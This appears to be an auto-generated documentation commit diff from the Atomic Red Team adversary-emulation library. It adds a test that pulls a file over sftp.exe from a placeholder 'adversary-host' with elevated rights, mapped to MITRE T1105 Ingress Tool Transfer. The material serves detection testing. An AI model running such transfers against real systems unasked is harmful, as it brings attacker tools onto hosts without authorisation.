Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1666-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1667-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -1385,6 +1385,7 @@ command-and-control,T1105,Ingress Tool Transfer,33,Remote File Copy using PSCP,c
 command-and-control,T1105,Ingress Tool Transfer,34,Windows push file using scp.exe,2a4b0d29-e5dd-4b66-b729-07423ba1cd9d,powershell
 command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,powershell
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
+command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -946,6 +946,7 @@ command-and-control,T1105,Ingress Tool Transfer,33,Remote File Copy using PSCP,c
 command-and-control,T1105,Ingress Tool Transfer,34,Windows push file using scp.exe,2a4b0d29-e5dd-4b66-b729-07423ba1cd9d,powershell
 command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,powershell
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
+command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1889,6 +1889,7 @@
   - Atomic Test #34: Windows push file using scp.exe [windows]
   - Atomic Test #35: Windows pull file using scp.exe [windows]
   - Atomic Test #36: Windows push file using sftp.exe [windows]
+  - Atomic Test #37: Windows pull file using sftp.exe [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1326,6 +1326,7 @@
   - Atomic Test #34: Windows push file using scp.exe [windows]
   - Atomic Test #35: Windows pull file using scp.exe [windows]
   - Atomic Test #36: Windows push file using sftp.exe [windows]
+  - Atomic Test #37: Windows pull file using sftp.exe [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]

atomics/Indexes/index.yaml

@@ -79422,6 +79422,59 @@ command-and-control:
           $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
           Remove-Item -Path $filePath -Force
           Write-Output "File deleted: $filePath"
+    - name: Windows pull file using sftp.exe
+      auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
+      description: 'This test simulates pulling files using SFTP on a Windows environment.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: Path of file to pull
+          type: path
+          default: "/tmp/T1105.txt"
+        remote_host:
+          description: Remote host to pull from
+          type: string
+          default: adversary-host
+        local_path:
+          description: Local path to receive files
+          type: path
+          default: C:\temp
+        username:
+          description: User account to authenticate on remote host
+          type: string
+          default: adversary
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'This test requires the `sftp` command to be available on the
+          system.
+
+          '
+        prereq_command: |
+          if (Get-Command sftp -ErrorAction SilentlyContinue) {
+              Write-Output "SFTP command is available."
+              exit 0
+          } else {
+              Write-Output "SFTP command is not available."
+              exit 1
+          }
+        get_prereq_command: |
+          # Define the capability name for OpenSSH Client
+          $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
+          try {
+              # Install the OpenSSH Client capability
+              Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
+              Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
+          } catch {
+              # Handle any errors that occur during the installation process
+              Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
+          }
+      executor:
+        elevation_required: true
+        name: powershell
+        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}'
   T1665:
     technique:
       modified: '2024-04-18T19:44:00.603Z'

atomics/Indexes/windows-index.yaml

@@ -65714,6 +65714,59 @@ command-and-control:
           $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
           Remove-Item -Path $filePath -Force
           Write-Output "File deleted: $filePath"
+    - name: Windows pull file using sftp.exe
+      auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
+      description: 'This test simulates pulling files using SFTP on a Windows environment.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: Path of file to pull
+          type: path
+          default: "/tmp/T1105.txt"
+        remote_host:
+          description: Remote host to pull from
+          type: string
+          default: adversary-host
+        local_path:
+          description: Local path to receive files
+          type: path
+          default: C:\temp
+        username:
+          description: User account to authenticate on remote host
+          type: string
+          default: adversary
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'This test requires the `sftp` command to be available on the
+          system.
+
+          '
+        prereq_command: |
+          if (Get-Command sftp -ErrorAction SilentlyContinue) {
+              Write-Output "SFTP command is available."
+              exit 0
+          } else {
+              Write-Output "SFTP command is not available."
+              exit 1
+          }
+        get_prereq_command: |
+          # Define the capability name for OpenSSH Client
+          $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
+          try {
+              # Install the OpenSSH Client capability
+              Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
+              Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
+          } catch {
+              # Handle any errors that occur during the installation process
+              Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
+          }
+      executor:
+        elevation_required: true
+        name: powershell
+        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}'
   T1665:
     technique:
       modified: '2024-04-18T19:44:00.603Z'

atomics/T1105/T1105.md

@@ -82,6 +82,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
 
 - [Atomic Test #36 - Windows push file using sftp.exe](#atomic-test-36---windows-push-file-using-sftpexe)
 
+- [Atomic Test #37 - Windows pull file using sftp.exe](#atomic-test-37---windows-pull-file-using-sftpexe)
+
 
 <br/>
 
@@ -1814,4 +1816,67 @@ try {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #37 - Windows pull file using sftp.exe
+This test simulates pulling files using SFTP on a Windows environment.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_path | Path of file to pull | path | /tmp/T1105.txt|
+| remote_host | Remote host to pull from | string | adversary-host|
+| local_path | Local path to receive files | path | C:&#92;temp|
+| username | User account to authenticate on remote host | string | adversary|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: This test requires the `sftp` command to be available on the system.
+##### Check Prereq Commands:
+```powershell
+if (Get-Command sftp -ErrorAction SilentlyContinue) {
+    Write-Output "SFTP command is available."
+    exit 0
+} else {
+    Write-Output "SFTP command is not available."
+    exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+# Define the capability name for OpenSSH Client
+$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
+try {
+    # Install the OpenSSH Client capability
+    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
+    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
+} catch {
+    # Handle any errors that occur during the installation process
+    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
+}
+```
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -1173,6 +1173,7 @@ atomic_tests:
       Write-Output "File deleted: $filePath"
 
 - name: Windows pull file using sftp.exe
+  auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
   description: |
     This test simulates pulling files using SFTP on a Windows environment.
   supported_platforms:

atomics/used_guids.txt

@@ -1695,3 +1695,4 @@ de323a93-2f18-4bd5-ba60-d6fca6aeff76
 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d
 401667dc-05a6-4da0-a2a7-acfe4819559c
 205e676e-0401-4bae-83a5-94b8c5daeb22
+3d25f1f2-55cb-4a41-a523-d17ad4cfba19